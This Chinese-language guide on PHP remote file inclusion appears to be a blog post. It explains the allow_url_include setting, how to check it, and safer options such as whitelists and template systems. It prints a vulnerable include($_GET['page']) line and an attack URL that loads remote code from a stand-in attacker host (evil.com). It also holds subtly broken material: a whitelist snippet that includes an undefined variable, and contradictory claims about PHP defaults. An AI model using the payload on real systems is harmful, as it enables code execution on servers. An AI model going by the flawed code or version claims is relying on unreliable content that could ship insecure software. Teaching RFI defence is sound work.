PHP远程文件包含风险及防范指南

PHP远程文件包含（RFI）并非设计功能，而是由危险配置allow_url_include=On引发的高危漏洞，攻击者可借此执行任意远程代码；尽管PHP 8.0+已默认禁用该选项，但大量旧系统、共享主机及配置疏忽的生产环境仍普遍存在风险，必须严格检查并关闭allow_url_include，杜绝用户输入直连include类函数，并采用白名单、模板预取或安全内容加载等合规替代方案——一次配置疏漏，就可能让整个应用沦为黑客跳板。

PHP远程文件包含（RFI）不是功能，是漏洞

PHP本身没有“远程文件包含”这个安全功能，include、require、include_once、require_once 这些函数在默认配置下**确实支持远程 URL（如 http:// 或 ftp://）作为参数**，但这属于危险的副作用，不是设计用途。PHP 8.0+ 已默认禁用该行为；低版本若开启 allow_url_include=On（且 allow_url_fopen=On），就构成 RFI 漏洞温床。

典型错误写法：include($_GET['page'] . '.php'); —— 攻击者传入 ?page=http://evil.com/shell 即可执行任意远程代码。

如何确认你的 PHP 是否暴露 RFI 风险

检查两个关键配置项是否同时为 On：

• allow_url_fopen：控制能否用 fopen()、file_get_contents() 等打开远程资源（很多合法业务依赖它）
• allow_url_include：**唯一决定 include 类函数能否加载远程文件的开关**；只要它是 Off（PHP 5.2+ 默认值），RFI 就无法触发

运行 phpinfo() 或执行：

var_dump(ini_get('allow_url_fopen'), ini_get('allow_url_include'));

替代远程包含的合规做法

业务真需要动态加载远程内容（比如拉取 API 响应、模板片段），必须绕过 include，改用受控方式：

• 用 file_get_contents() 或 curl 获取内容 → 存入本地临时文件或内存变量 → 再用 eval()（仅限绝对可信源，极不推荐）或 htmlspecialchars() 后输出（纯展示场景）
• 模板系统统一管理：如 Twig、Blade 禁止动态路径，所有远程数据走 Controller 层预取 + 变量注入
• 白名单机制：若必须拼接文件名，只允许匹配预定义列表，例如 $pages = ['home', 'about']; if (in_array($_GET['p'], $pages)) { include "$p.php"; }

永远不要把用户输入直接喂给 include，哪怕加了 str_replace('http://', '', ...) —— 绕过方法太多（https://、data://、php://filter 等协议都可能被利用）。

PHP 8.0+ 的变化和遗留陷阱

PHP 8.0 起，allow_url_include 默认为 Off，且 include('http://...') 会直接报 Warning: include(): Unable to find the wrapper "http"。但注意：

• 旧项目升级后若没测兼容性，可能因原本依赖的远程加载逻辑失效而报错（这不是漏洞，是功能断裂）
• 某些 Docker 镜像或 PaaS 平台仍保留 allow_url_include=On，需人工核查
• php://input、data:// 等伪协议仍可能被用于 LFI（本地文件包含）提权，与 RFI 无关但常被混淆

最易被忽略的是：开发时本地环境关了 allow_url_include，但上线用的共享主机或老旧运维脚本悄悄打开了它——上线前必须验证生产环境的 ini_get('allow_url_include') 值。

今天带大家了解了的相关知识，希望对你有所帮助；关于文章的技术知识我们会一点点深入介绍，欢迎大家关注golang学习网公众号，一起学习编程~